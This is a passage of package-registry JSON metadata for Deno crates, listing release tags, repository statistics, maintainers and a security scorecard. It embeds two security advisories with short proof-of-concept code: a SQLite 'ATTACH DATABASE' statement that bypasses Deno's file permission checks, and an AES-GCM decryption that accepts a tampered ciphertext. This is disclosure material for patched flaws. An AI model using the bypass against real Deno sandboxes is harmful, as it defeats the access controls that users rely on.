59e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-07T20:47:18.601Z","dependent_packages_count":9,"downloads":507439,"downloads_period":"total","dependent_repos_count":8,"rankings":{"downloads":6.475824881626313,"dependent_repos_count":8.357187166015203,"dependent_packages_count":3.8482522552148337,"stargazers_count":0.0022405114340766853,"forks_count":0.05750646014130159,"docker_downloads_count":6.790478681663616,"average":4.255248326015891},"purl":"pkg:cargo/deno_node","advisories":[{"uuid":"GSA_kwCzR0hTQS04dnhqLTRjcGgtYzU5Ns4ABIpO","url":"https://github.com/advisories/GHSA-8vxj-4cph-c596","title":"Deno has --allow-read / --allow-write permission bypass in `node:sqlite`","description":"## Summary\n\nIt is possible to bypass Deno's read/write permission checks by using `ATTACH DATABASE` statement.\n\n## PoC\n\n```js\n// poc.js\nimport { DatabaseSync } from \"node:sqlite\"\n\nconst db = new DatabaseSync(\":memory:\");\ndb.exec(\"ATTACH DATABASE 'test.db' as test;\");\n\ndb.exec(\"CREATE TABLE test.test (id INTEGER PRIMARY KEY, name TEXT);\");\n```\n\n```\n$ deno poc.js\n```","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-06-04T21:22:27.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.5,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P","references":["https://github.com/denoland/deno/security/advisories/GHSA-8vxj-4cph-c596","https://github.com/denoland/deno/commit/31a97803995bd94629528ba841b2418d3ca01860","https://nvd.nist.gov/vuln/detail/CVE-2025-48935","https://rustsec.org/advisories/RUSTSEC-2025-0138.html","https://github.com/advisories/GHSA-8vxj-4cph-c596"],"source_kind":"github","identifiers":["GHSA-8vxj-4cph-c596","CVE-2025-48935"],"repository_url":"https://github.com/denoland/deno","blast_radius":4.96699492845569,"created_at":"2025-06-04T22:08:12.441Z","updated_at":"2026-09-07T05:05:33.179Z","epss_percentage":0.00468,"epss_percentile":0.38789,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04dnhqLTRjcGgtYzU5Ns4ABIpO","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04dnhqLTRjcGgtYzU5Ns4ABIpO","packages":[{"ecosystem":"cargo","package_name":"deno_node","versions":[{"first_patched_version":"0.134.0","vulnerable_version_range":"\u003e= 0.129.0, \u003c 0.134.0"}],"purl":"pkg:cargo/deno_node"},{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.2.5","vulnerable_version_range":"\u003e= 2.2.0, \u003c 2.2.5"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04dnhqLTRjcGgtYzU5Ns4ABIpO/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0yeDNyLWh3djUtcDMyeM4ABIpI","url":"https://github.com/advisories/GHSA-2x3r-hwv5-p32x","title":"Deno's AES GCM authentication tags are not verified","description":"### Summary\n\nThis affects AES-256-GCM and AES-128-GCM in Deno, introduced by commit [0d1beed](https://github.com/denoland/deno/commit/0d1beed). Specifically, the authentication tag is not being validated. This means tampered ciphertexts or incorrect keys might not be detected, which breaks the guarantees expected from AES-GCM. Older versions of Deno correctly threw errors in such cases, as does Node.js.\n\nWithout authentication tag verification, AES-GCM degrades to essentially CTR mode, removing integrity protection. Authenticated data set with set_aad is also affected, as it is incorporated into the GCM hash (ghash) but this too is not validated, rendering AAD checks ineffective.\n\n### PoC\n\n```ts\nimport { Buffer } from \"node:buffer\";\nimport {\n  createCipheriv,\n  createDecipheriv,\n  randomBytes,\n  scrypt,\n} from \"node:crypto\";\n\ntype Encrypted = {\n  salt: string;\n  iv: string;\n  enc: string;\n  authTag: string;\n};\n\nconst deriveKey = (key: string, salt: Buffer) =\u003e\n  new Promise\u003cBuffer\u003e((res, rej) =\u003e\n    scrypt(key, salt, 32, (err, k) =\u003e {\n      if (err) rej(err);\n      else res(k);\n    })\n  );\n\nasync function encrypt(text: string, key: string): Promise\u003cEncrypted\u003e {\n  const salt = randomBytes(32);\n  const k = await deriveKey(key, salt);\n\n  const iv = randomBytes(16);\n  const enc = createCipheriv(\"aes-256-gcm\", k, iv);\n  const ciphertext = enc.update(text, \"binary\", \"binary\") + enc.final(\"binary\");\n\n  return {\n    salt: salt.toString(\"binary\"),\n    iv: iv.toString(\"binary\"),\n    enc: ciphertext,\n    authTag: enc.getAuthTag().toString(\"binary\"),\n  };\n}\n\nasync function decrypt(enc: Encrypted, key: string) {\n  const k = await deriveKey(key, Buffer.from(enc.salt, \"binary\"));\n  const dec = createDecipheriv(\"aes-256-gcm\", k, Buffer.from(enc.iv, \"binary\"));\n\n  const out = dec.update(enc.enc, \"binary\", \"binary\");\n  dec.setAuthTag(Buffer.from(enc.authTag, \"binary\"));\n  return out + dec.final(\"binary\");\n}\n\nconst test = await encrypt(\"abcdefghi\", \"key\");\ntest.enc = \"\";\nconsole.log(await decrypt(test, \"\")); // no error\n```\n\n### Impact\n\nWhile discovered through experimentation, authentication failures that should raise errors may be silently ignored.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-06-04T20:48:56.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P","references":["https://github.com/denoland/deno/security/advisories/GHSA-2x3r-hwv5-p32x","https://nvd.nist.gov/vuln/detail/CVE-2025-24015","https://github.com/denoland/deno/commit/0d1beed2e3633d71d5e288e0382b85be361ec13d","https://github.com/denoland/deno/commit/4f27d7cdc02e3edfb9d36275341fb8185d6e99ed","https://github.com/denoland/deno/commit/a4003a5292bd0affefad3ecb24a8732886900f67","https://github.com/denoland/deno/commit/0d1beed","https://github.com/advisories/GHSA-2x3r-hwv5-p32x"],"source_kind":"github","identifiers":["GHSA-2x3r-hwv5-p32x","CVE-2025-24015"],"repository_url":"https://github.com/denoland/deno","blast_radius":6.953792899837965,"created_at":"2025-06-04T21:08:18.873Z","updated_at":"2026-09-07T05:05:33.184Z","epss_percentage":0.00275,"epss_percentile":0.19509,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yeDNyLWh3djUtcDMyeM4ABIpI","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0yeDNyLWh3djUtcDMyeM4ABIpI","packages":[{"ecosystem":"cargo","package_name":"deno_node","versions":[{"first_patched_version":"0.125.0","vulnerable_version_range":"\u003e= 0.102.0, \u003c 0.125.0"}],"purl":"pkg:cargo/deno_node"},{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.1.7","vulnerable_version_range":"\u003e= 1.46.0, \u003c 2.1.7"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yeDNyLWh3djUtcDMyeM4ABIpI/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_node","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_node","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_node/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-07T13:25:49.747Z","issues_count":6659,"pull_requests_count":9671,"avg_time_to_close_issue":17134708.21400472,"avg_time_to_close_pull_request":1530358.8397069778,"issues_closed_count":3811,"pull_requests_closed_count":8053,"pull_request_authors_count":591,"issue_authors_count":2494,"avg_comments_per_issue":2.5029283676227663,"avg_comments_per_pull_request":0.7209182090786889,"merged_pull_requests_count":7031,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":681,"past_year_pull_requests_count":1194,"past_year_avg_time_to_close_issue":1348806.688034188,"past_year_avg_time_to_close_pull_request":1303670.810240964,"past_year_issues_closed_count":234,"past_year_pull_requests_closed_count":664,"past_year_pull_request_authors_count":193,"past_year_issue_authors_count":377,"past_year_avg_comments_per_issue":1.234948604992658,"past_year_avg_comments_per_pull_request":1.134003350083752,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":497,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-08T05:39:01.038Z","updated_at":"2022-11-08T05:39:01.038Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:30.356Z","updated_at":"2023-07-18T22:41:30.356Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":12657482,"name":"deno_image","ecosystem":"cargo","description":"Image handling implementation for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":34,"first_release_published_at":"2026-01-05T12:53:19.053Z","latest_release_published_at":"2026-08-27T15:20:31.083Z","latest_release_number":"0.34.0","last_synced_at":"2026-09-07T22:59:04.624Z","created_at":"2026-01-05T13:02:25.383Z","updated_at":"2026-09-08T09:35:11.880Z","registry_url":"https://crates.io/crates/deno_image/","install_command":"cargo install deno_image","documentation_url":"https://docs.rs/deno_image/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in 